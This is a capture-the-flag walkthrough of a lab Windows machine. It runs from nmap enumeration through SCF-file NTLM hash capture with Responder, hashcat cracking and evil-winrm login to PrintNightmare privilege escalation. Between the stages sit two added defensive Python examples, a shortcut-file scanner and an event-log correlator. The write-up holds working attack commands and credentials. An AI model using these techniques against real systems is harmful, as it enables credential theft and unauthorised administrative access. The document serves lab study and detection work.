Enumeration
The first thing to do is enumerate the machine. I use nmap to enumerate all open ports.
nmap -sV -sC -O -p- -T4 10.10.11.106
There are four open ports with services: port 80 for HTTP, port 135 for MS RPC, port 445 for SMB, and port 5985 for WinRM. So I go to port 80 and find that the website asks for authentication. I try default credentials such as admin:admin1, admin:admin, administrator:password, etc., and luckily one of these default credentials gets me in.
This is the main webpage. Let's look for interesting features.
From here, I find that we can upload something to the server.
Let's give it a shot. I try to upload a test file.
And it is uploaded successfully.
Gaining Access
From here, I know that we can upload a file and the server will store it via the SMB protocol on port 445. Searching on Google, several websites recommend some techniques. First, I will try EternalBlue using Metasploit.
Setting some options for the target.
And run it.
It seems SMB is not vulnerable to the EternalBlue exploit in Metasploit. Then I try the psexec exploit in Metasploit.
Again, it is not vulnerable to the psexec exploit. I don't really know what's wrong. After a while, I find a website that suggests capturing the NTLM (New Technology LAN Manager) hash. So I use a tool to make an "scf" file and set up Responder to catch the hashes that get sent back to us.
python3 ntlm_theft.py -f config -g scf -s 10.10.16.27 (my IP)
Setting up Responder to listen on the tun0 interface.
responder -I tun0
Uploading the scf file.
Then, after the upload finishes, I click browse and Responder returns the hash.
Cracking it with hashcat so I can get the credentials.
hashcat -m 5600 hash.txt rockyou.txt --force -O
And I find that the password is liltony and the username is TONY. Then I use evil-winrm to log in.
evil-winrm -i 10.10.11.106 (target) -u TONY (username) -p liltony (password) -P 5985 (port)
And I successfully gain access. Enumerating the system, I find user.txt inside the Desktop folder.
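On the defensive side, the SCF trick above works because Explorer resolves the IconFile UNC path while rendering the folder and authenticates to whatever host it names. As an added example (my own code, not the author's tooling or the ntlm_theft project), here is a Python scanner for a writable share that parses .scf files, and also .url shortcuts since they use the same INI-style IconFile/URL keys, and flags any remote host outside an assumed allow-list. The allowed hostnames and the sample SCF content are constructed for the example.

```python
"""Scan a writable share or upload directory for shortcut files whose icon
or target points at a remote SMB host. Added example for the SCF technique
described above; allowed hosts and paths are assumptions, not site data."""
import re
import sys
from pathlib import Path

# Hosts this share may legitimately reference (assumption for the example).
ALLOWED_HOSTS = {"fileserver", "fileserver.corp.local"}

# Keys in .scf / .url files that Explorer resolves when it renders the folder.
KEY_RE = re.compile(r"^\s*(IconFile|URL)\s*=\s*(.+?)\s*$", re.I | re.M)
# \\host\share\... and file://host/... both trigger an outbound SMB connection.
UNC_RE = re.compile(r"^\\\\([^\\/\s]+)(?:[\\/]|$)")
FILE_URL_RE = re.compile(r"^file://([^\\/\s]+)(?:[\\/]|$)", re.I)

# Constructed sample, shaped like an SCF icon-redirect file (not the real upload).
SAMPLE_SCF = (
    "[Shell]\n"
    "Command=2\n"
    "IconFile=\\\\10.10.16.27\\share\\test.ico\n"
    "[Taskbar]\n"
    "Command=ToggleDesktop\n"
)


def remote_host(value: str):
    """Return the host named by a UNC path or file:// URL, lowercased, else None."""
    value = value.strip().strip('"')
    m = UNC_RE.match(value) or FILE_URL_RE.match(value)
    return m.group(1).lower() if m else None


def find_external_refs(text: str, allowed=ALLOWED_HOSTS):
    """List (key, host) pairs whose host is not on the allow-list."""
    findings = []
    for m in KEY_RE.finditer(text):
        host = remote_host(m.group(2))
        if host is not None and host not in allowed:
            findings.append((m.group(1), host))
    return findings


def scan_directory(root, extensions=(".scf", ".url")):
    """Walk `root` and map each offending file path to its findings."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in extensions:
            hits = find_external_refs(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for file, hits in scan_directory(sys.argv[1]).items():
            print(file, hits)
    else:
        print(find_external_refs(SAMPLE_SCF))
```

Run it against the share root on a schedule, or from an upload hook before a file is written; the allow-list matters because legitimate shortcuts to an internal file server should not page anyone, while an icon path to an address nobody in the team recognises is worth quarantining before a user browses the folder.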
Privilege Elevation
Then I try to enumerate for exploits using winPEAS. First, I upload the bat version of winPEAS, using the "upload" command to upload files through evil-winrm.
upload /directory/winPEASbat
Run it.
I find nothing useful from winPEASbat, so I try winPEASexe.
It finds some usernames with administrator privileges.
And it finds some of these open ports listening locally.
After searching on the internet, I find these exploits, CVE-2021-34527 and CVE-2021-1675. I download the CVE-2021-1675 script and upload it.
Then I import the module from this CVE script and invoke it.
After that, I try to log in with the username adm1n and the password P@ssw0rd.
And I successfully get administrator privileges. Enumerating a while longer, I find root.txt.
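From a detection standpoint, the escalation above leaves a distinctive trail in the event log: the spooler loads a printer driver, and moments later a new local account appears and is added to Administrators. As an added example (mine, not part of this write-up or of the CVE script), here is a small Python correlator run over constructed sample events; the hostname, times and driver name are made up, while the event IDs (PrintService/Operational 316, PrintService/Admin 808, Security 4720 and 4732) and the Administrators SID are the standard Windows values.

```python
"""Correlate Windows event records for the escalation pattern above: a printer
driver load by the spooler, followed shortly by a new local account that is
added to Administrators. Added example with constructed sample events."""
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group
# Spooler driver-add events: PrintService/Operational 316, PrintService/Admin 808.
DRIVER_EVENTS = {("Microsoft-Windows-PrintService/Operational", 316),
                 ("Microsoft-Windows-PrintService/Admin", 808)}

# Constructed sample records, shaped like flattened event-log exports (not real logs).
SAMPLE_EVENTS = [
    {"time": "2021-10-02T10:00:05", "host": "WS01",
     "channel": "Microsoft-Windows-PrintService/Operational", "event_id": 316,
     "driver": "example-driver"},
    {"time": "2021-10-02T10:00:07", "host": "WS01", "channel": "Security",
     "event_id": 4720, "subject_user": "SYSTEM", "target_user": "adm1n"},
    {"time": "2021-10-02T10:00:08", "host": "WS01", "channel": "Security",
     "event_id": 4732, "subject_user": "SYSTEM", "member": "adm1n",
     "group_sid": ADMINS_SID},
    # Ordinary admin work hours later: an account is created with no driver load nearby.
    {"time": "2021-10-02T14:30:00", "host": "WS01", "channel": "Security",
     "event_id": 4720, "subject_user": "Administrator", "target_user": "svc_backup"},
    {"time": "2021-10-02T14:30:03", "host": "WS01", "channel": "Security",
     "event_id": 4732, "subject_user": "Administrator", "member": "svc_backup",
     "group_sid": ADMINS_SID},
]


def _t(event):
    return datetime.fromisoformat(event["time"])


def correlate(events, window_minutes=10):
    """Return one alert per account that was created and added to Administrators
    within `window_minutes` after a driver-add event on the same host."""
    window = timedelta(minutes=window_minutes)
    events = sorted(events, key=_t)
    driver_loads = [(e["host"], _t(e)) for e in events
                    if (e["channel"], e["event_id"]) in DRIVER_EVENTS]
    created = {(e["host"], e["target_user"].lower()): _t(e)
               for e in events if e["event_id"] == 4720}
    alerts = []
    for e in events:
        if e["event_id"] != 4732 or e.get("group_sid") != ADMINS_SID:
            continue
        t_add = _t(e)
        t_create = created.get((e["host"], e["member"].lower()))
        if t_create is None or not (t_add - window <= t_create <= t_add):
            continue  # account existed before; not the create-then-elevate pattern
        if any(h == e["host"] and t_add - window <= t <= t_add for h, t in driver_loads):
            alerts.append({"host": e["host"], "account": e["member"],
                           "created": t_create.isoformat(),
                           "added_to_admins": t_add.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print("possible spooler-driven local admin creation:", alert)
```

The correlation is deliberately narrow: a driver load alone is normal on a print server, and account creation alone is routine, but both within a few minutes on the same host, with the spooler's SYSTEM identity as the subject, is the shape a PrintNightmare-style driver payload produces. The second pair of sample events shows the rule staying quiet for an administrator doing the same thing by hand hours later.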